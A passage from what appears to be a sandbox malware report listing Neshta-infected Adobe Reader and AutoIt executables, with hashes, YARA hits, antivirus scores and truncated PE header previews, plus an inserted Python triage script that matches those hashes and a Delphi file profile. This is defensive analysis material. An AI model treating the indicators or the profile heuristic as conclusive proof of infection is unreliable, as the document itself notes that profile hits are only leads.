                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.461209967778202
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCl8H777b4o4yre0zlbTzqYOeg9lZdKMOZo2:sr85Cl8Hn7b4o4kbT93Kxj2
                                                                                                                        MD5:72EC370FCAB5AC9E14C7DE1B93C0B954
                                                                                                                        SHA1:B2216AE2B03F902878D852F9D52FFA704C76F61F
                                                                                                                        SHA-256:DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039
                                                                                                                        SHA-512:6046A04E192C329D56FBC11118269DEEA06053D6C0C41FF5E6225938476B54969A03345D3B46F84B54D7B5262230584218466651E7B4ADDAA0E642AF3CF4F6F2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.302303877870808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCeJ8cSLgpA3hKwYPRvGdIab:sr85CncSLgpG88b
                                                                                                                        MD5:B41F70A22F31E1DA8FF057AD47499F3E
                                                                                                                        SHA1:15918D00F2C8DE480C4D3749D5317468C1B14DA0
                                                                                                                        SHA-256:8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E
                                                                                                                        SHA-512:5F0C77A4842BA7FC53CECA4F641FA906EA0D26652876406B52158DC6BC3D36ADCC3A63E6FDA5B226073320ED301A21A6AFC87B930ED4D5B91058172727AB47A4
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.261294291615621
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmwGqE9qLa7QoIG5fIIXBB8C:sr85CaqcVz5fzsC
                                                                                                                        MD5:F25F4BF1D71532CE97C90BEEC7A56FBC
                                                                                                                        SHA1:337C45D81469B760EB7ADA0316AFC262FE4C3721
                                                                                                                        SHA-256:B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33
                                                                                                                        SHA-512:5AEDA5CCD0F38392FEF3F14AD49EAC63D03ECBFDDC89D326DFE0ED03A225A1E7496B02D5F983168D1D7C96448F90718B6975A8D58EAAA6DF9626C27D4AF96DAC
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.423139673646388
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCULKBHLLkRkjuXi65D5mFv1:sr85CU0LFjAiGI
                                                                                                                        MD5:C4CA362C5EF952BAF96EF61B59D8355D
                                                                                                                        SHA1:5DEB0DAE7262FF31BD9B2C2205D55D2E5D012CEF
                                                                                                                        SHA-256:A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E
                                                                                                                        SHA-512:49261B804AB74A90DCE657FD7C4FE87F42505F673847C143C42A4CF89E2BF3226C329630ECCBF19FB584071FC4E7DAFFA7725F66A7E7936DC8CDF4A3E73425E3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.355719905315724
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdjrXDyO4zkm8dbHVLokF8iJTwRH0n:sr85CVrMzkm8PL3Eo
                                                                                                                        MD5:A42467B5C21814776277B4CE3456D716
                                                                                                                        SHA1:B01DD2412ADA123EF3D6317F839826D37C6A27D4
                                                                                                                        SHA-256:B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9
                                                                                                                        SHA-512:62D2AECABE4892E0E25A9787A28898EC989A4AA54A66CDB7DE65EB48A8634E0274EB6515722EA1FA580C848E1AD683C75CE26F6AB7D7F7E48A5DD064DD1B3A24
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                         • Antivirus: Metadefender, Detection: 91%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
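The dropped-file entries above share one profile: each infected Reader binary is written by C:\Windows\svchost.com, is exactly 82944 bytes, and its preview begins with a Borland/Delphi "MZP" DOS stub carrying the "This program must be run under Win32" message and the section names CODE, DATA, BSS, .idata, .tls, .rdata, .reloc and .rsrc. The script below is an added triage example, not part of the Joe Sandbox report or of any Neshta tooling: it hashes every .exe under a directory, matches against the nine SHA-256 values listed for the infected Reader binaries in this section, and flags any other file that fits the same size-and-header profile. The "MZP" stub and that section layout are produced by any Delphi-compiled executable, so the profile check is a hunting heuristic to prioritise files for review, not a detection on its own; the hash list and the MAL_Neshta_Generic rule cited on the page are the authoritative signals. The build_constructed_sample() helper synthesises a minimal PE image for offline testing and is constructed data, not a Neshta body.

```python
"""Triage helper for the Neshta-infected Reader binaries listed above.

Added example, not part of the Joe Sandbox report. Flags files that match the
report's SHA-256 IOCs, or that fit the profile every infected entry shares:
82944 bytes, Delphi 'MZP' stub + 'This program must be run under Win32',
and the section names CODE/DATA/BSS/.idata/.tls/.rdata/.reloc/.rsrc.
"""
import hashlib
import os
import struct

# SHA-256 values copied from the dropped-file entries in this section (uppercase, as listed).
NESHTA_SHA256 = {
    "647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73",  # AcroRd32.exe
    "BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D",  # AcroTextExtractor.exe
    "CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8",  # AdobeCollabSync.exe
    "DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039",  # WCChromeNativeMessagingHost.exe
    "8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E",  # Eula.exe
    "B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33",  # FullTrustNotifier.exe
    "A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E",  # LogTransport2.exe
    "B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9",  # arh.exe
    "1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4",  # 32BitMAPIBroker.exe
}

INFECTED_SIZE = 82944  # "Size (bytes)" of every infected entry in this section
DELPHI_STUB_MSG = b"This program must be run under Win32"
DELPHI_SECTIONS = [b"CODE", b"DATA", b"BSS", b".idata", b".tls", b".rdata", b".reloc", b".rsrc"]


def section_names(data: bytes) -> list:
    """Return the PE section names, in table order, or [] if the headers are unusable."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                               # first IMAGE_SECTION_HEADER
    names = []
    for i in range(nsec):
        off = table + i * 40
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0"))
    return names


def profile(data: bytes) -> dict:
    """Collect the fields the infected entries above have in common, plus the file hash."""
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "mzp_stub": data[:3] == b"MZP",
        "win32_msg": DELPHI_STUB_MSG in data[:0x200],
        "sections": section_names(data),
    }


def classify(data: bytes, ioc_hashes=NESHTA_SHA256) -> str:
    """'ioc-match' beats 'profile-match'; a profile hit alone only means 'look at this next'."""
    p = profile(data)
    if p["sha256"] in ioc_hashes:
        return "ioc-match"
    if (p["size"] == INFECTED_SIZE and p["mzp_stub"] and p["win32_msg"]
            and p["sections"] == DELPHI_SECTIONS):
        return "profile-match"
    return "clean"


def scan_dir(root: str, ioc_hashes=NESHTA_SHA256):
    """Yield (path, verdict) for every .exe below root."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".exe"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    yield path, classify(fh.read(), ioc_hashes)


def build_constructed_sample(stub=b"MZP", size=INFECTED_SIZE, sections=DELPHI_SECTIONS) -> bytes:
    """Constructed test image: only the header fields profile() reads are meaningful.
    Not a Neshta body; it just reproduces the stub, size and section layout seen above."""
    hdr = bytearray(0x80)
    hdr[0:len(stub)] = stub
    struct.pack_into("<I", hdr, 0x3C, 0x80)                        # e_lfanew -> PE header
    msg = DELPHI_STUB_MSG if stub == b"MZP" else b"This program cannot be run in DOS mode"
    hdr[0x40:0x40 + len(msg)] = msg
    pe = bytearray(b"PE\0\0")
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSymbols, SizeOfOptionalHeader=0, Characteristics
    pe += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x10F)
    for name in sections:
        pe += name.ljust(8, b"\0") + bytes(32)                     # 40-byte section header, name only
    return (bytes(hdr) + bytes(pe)).ljust(size, b"\0")


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else r"C:\Program Files (x86)\Adobe\Acrobat Reader DC"
    for path, verdict in scan_dir(root):
        if verdict != "clean":
            print(verdict, path)
```

Run it against the Reader install directory on a suspect host (the default root is the directory the infected entries above live in). A profile-match on a machine where the sandbox IOCs do not fire is the expected outcome, because Neshta writes a different host tail into every file it infects and the hashes above are specific to this sandbox run; treat such hits as candidates for the MAL_Neshta_Generic rule rather than as confirmed infections.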
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.228109838185618
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3uireklhKsikOkCWfNU:sr85C+ilU9xL
                                                                                                                        MD5:B9A06C8C07B4BC86001ABCA5835AEED2
                                                                                                                        SHA1:5EA2F32AD6F1642498CDE9F8CA74D8A70DE376E0
                                                                                                                        SHA-256:1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4
                                                                                                                        SHA-512:79C9F72832E53AED9E50C680F0146E6F971D77299E192DD61500E8B91117E19373C7EC92B84A31B2934FD65CD6090E9613BC6F62A2337A1313E7E52A1041B04E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.26326337462311
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFbIJyoI91593nKMd/VHT:sr85CFboI9133K+HT
                                                                                                                        MD5:7C2E8C0527C5CFF276FB2FFA314D455A
                                                                                                                        SHA1:6B6FD014B9C295838E0F1F2D563C185A0004C028
                                                                                                                        SHA-256:41AEBB2A2B6175595684D20DF5F7B8AB8FEB2B5662530F6593287F9F72777296
                                                                                                                        SHA-512:2138731F6006CB6DF13821E05DC16EDEBF7F70777906AB03271707A1237DBFD8859ED43795F36A87901D63BDAA4CC738E46B9D2D0D6361546FD64A2AE56EB65F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.079745714518026
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJCBF45im0N0I9U96lOQ7ABFPXdLtZqWn:JxqjQ+P04wsmJCJ4wNlu9HQIXsW/44
                                                                                                                        MD5:E6A82ED5EA7010F781B63E30C2377BEE
                                                                                                                        SHA1:1829EE1E5E5B34C9721F4EB51E3AD09F7A13DCE2
                                                                                                                        SHA-256:E02365CA739F356FE66B4F49C4D11EC156B0BB512211A177A813FC7D8B0C2DFD
                                                                                                                        SHA-512:2FD5BAF35A018DFF7FCA19A4C118E781FC9D03F9DDED1CEE8F2A5E9E6E41F1C99D984F24E5AB3E60AC2FFBD1B505F728410203D11234197D109BFDEC728ED40D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.352749197508949
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZti/kCXBIvpnJXCFgyf:sr85CzgkC+Jt6gA
                                                                                                                        MD5:E784AF0ED9D53B2A29B2EBBDDE7E470B
                                                                                                                        SHA1:203533AB59D90155BE6EC83B9E7FD643869FBA9D
                                                                                                                        SHA-256:D8B35FBB5A6A4E3069FF8E60BB9F35670DEEB5B5933820CCC4FC9D9D4148EB78
                                                                                                                        SHA-512:A2C77DD2CB33815273C4730892FB45F2EB086853CE7544890FA970F666249FCA61AEDFB826109293066C2F615B95CAE48E9C28F96B0C59D6EA0423B337BDF291
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.395396839059979
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBBTfrVijfDZaoXFdP+aWYEsPnBEbfOjBvX5zjjSbE51E6AoAV9:sr85CnfrV5EAVMczsELz7Vz
                                                                                                                        MD5:B4E63C549366CFCDA2363E35C197D41C
                                                                                                                        SHA1:10E1078FF8D1FD5FF2080FCB659A012630FD07E8
                                                                                                                        SHA-256:68BE6B2F5E8181E4E36DB6F370E3110C43D702E6953735FE6843D230FA6E7A37
                                                                                                                        SHA-512:FB0B06847F459BA7D439D20608C3A098AA01B18FEBBF3D014536A3CF21353EC0524922056BF151B3A0F66E00E758C36CDC49B44A59C81F78B6249E93B535C893
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.509452568334581
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCXl/TR5SDQQfzSIOOc1c:sr85CXFR5StHe+
                                                                                                                        MD5:A7D23C329BAABBA8B883C9B0EACCE4A5
                                                                                                                        SHA1:0E2B51FF3DA7806D0F5DCB403222D06637B08738
                                                                                                                        SHA-256:C2521122926A26FFDB7E9D56EE6E24682F1C76B573BEE8765E9E287CB1DCAE89
                                                                                                                        SHA-512:22116FE8362AA86EDBD268EF90A415B4E204416C39AB0312EFFA6E3C2C7C6AB85B000A642443DA071F61E3C370398D6C018E8F4582E9E854BAF2B3BCAB7E5D30
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.476428579556002
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzbdrFQAj9UlJZ4PAZav4RLRLK:sr85CfQO9UKRGRLK
                                                                                                                        MD5:02879251FEBD3B13DFA84C0DBB3B9387
                                                                                                                        SHA1:D2226312A4460980B036C0CFD3B7BF95752145D9
                                                                                                                        SHA-256:28C72711975DEA1917D0B4C996D93E945F0487DFBDEB1A0B298E9A724F6E8937
                                                                                                                        SHA-512:864BF0149EBBF033306C7B0FBD168D696DFFFEE012B61991C5F0B4D35F82ECE7FE276EBEDE901BF30E22529D8EDEDF3EE3FF64F9D18A411624DB3188ABA45E4E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.520333669037674
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC32EQwB3BsLsWIGihj58u9otwqtOk:sr85C325wztj5xiv
                                                                                                                        MD5:32C22D658E9A54E56C54B1A2AFE1D817
                                                                                                                        SHA1:E1DA8AA26A509BC23A761EB25267DCE9F8A7EF92
                                                                                                                        SHA-256:C957D33A54BD308948E37F020C3FD23DCBE4762DF1143EFAE8109433342DE76C
                                                                                                                        SHA-512:C669F6999EA0ABC48D7AEFB32CD067F37B2894C8EDB1EC538063ED47B719A4597C5BFB770C821DE0D0384FE3B4AC212368B629284D8740E8855D7281A84590C9
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.481287941039048
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrwiuLWf6G/YemcUCYY8AZqQwOp9yQeRoL3:sr85C0iuVAYemcUCN8AwhOpCoL
                                                                                                                        MD5:9C8E99E8AD1568B91CBC2A9FE09304A8
